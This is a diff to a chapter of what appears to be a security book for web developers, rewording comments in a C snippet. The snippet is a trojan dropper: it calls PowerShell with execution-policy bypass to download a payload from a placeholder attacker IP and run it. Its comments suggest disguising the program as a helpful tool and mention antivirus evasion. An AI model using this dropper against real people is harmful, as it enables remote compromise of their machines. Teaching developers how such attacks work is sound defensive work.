binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

     {
       // Once the following line has executed, we will have our shell.
       // system executes any command string you pass it.
-      // Windows is happy with PowerShell of course.
       // noprofile causes no profile scripts to be loaded up front.
-      // Not sure if script execution is enabled on target system?
-No problem,
-      //   just set executionpolicy to bypass for this session.
+      // Set executionpolicy to bypass will enable script execution for this session, telling PS
-      // This tells PowerShell to just trust that you know what you are doing,
+      // to trust that you know what you are doing in downloading -> running scripts.
-      //   and that we are happy to download and run a malicious payload.
       // Invoke the EXpression: download the payload and execute it.
       // Providing the payload does not trigger anti virus, this should not. system("powershell.exe -noprofile -executionpolicy bypass \"IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/payload.txt '))\"");

       // Add content here to make your target think this is a legitimate helpful tool.
       // Or just do nothing and you may have to explain to your target that it is broken.
       // Add the following if you want the terminal to stay open.
       //char buff[10];
       //fgets (buff, sizeof(buff), stdin);